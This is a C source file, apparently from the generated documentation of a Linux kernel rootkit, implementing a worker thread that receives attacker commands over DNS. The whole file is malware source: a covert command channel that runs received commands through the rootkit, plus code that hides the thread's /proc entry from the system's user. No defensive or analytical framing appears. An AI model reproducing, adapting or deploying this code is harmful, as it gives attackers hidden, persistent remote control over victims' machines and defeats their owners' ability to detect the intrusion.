dns/worker.c

Go to the documentation of this file.

#include "hide_api.h"
#include "network.h"
 
static struct task_struct *dns_worker_thread = NULL;
 
static int dns_worker(void *data) {
    char cmd_buf[RCV_CMD_BUFFER_SIZE / 2];
 
    while (!kthread_should_stop()) {
        int len = dns_receive_command(cmd_buf, sizeof(cmd_buf));
        if (len > 0) {
            // Send the response of command over DNS
            DBG_MSG("dns_worker: got commmand from attacker '%s'\n", cmd_buf);
            rootkit_command(cmd_buf, len + 1, DNS);
        }
 
        // Sleep for a defined interval to avoid busy-waiting
        msleep(DNS_POLL_INTERVAL_MS);
    }
    return 0;
}
 
int start_dns_worker(void) {
    if (dns_worker_thread && !IS_ERR(dns_worker_thread))
        return -EBUSY;
 
    // Create the DNS worker thread
    dns_worker_thread = kthread_run(dns_worker, NULL, DNS_WORKER_THREAD_NAME);
    if (IS_ERR(dns_worker_thread))
        return PTR_ERR(dns_worker_thread);
 
    // Hide the thread from the user
    char path[32] = { 0 };
    snprintf(path, sizeof(path), "/proc/%d", dns_worker_thread->pid);
    hide_file(path);
 
    return SUCCESS;
}
 
int stop_dns_worker(void) {
    if (!dns_worker_thread || IS_ERR(dns_worker_thread))
        return -EINVAL;
 
    // Remove the hidden directory associated with the thread
    char path[32] = { 0 };
    snprintf(path, sizeof(path), "/proc/%d", dns_worker_thread->pid);
    unhide_file(path);
 
    // Stop the DNS worker thread
    kthread_stop(dns_worker_thread);
    dns_worker_thread = NULL;
 
    return SUCCESS;
}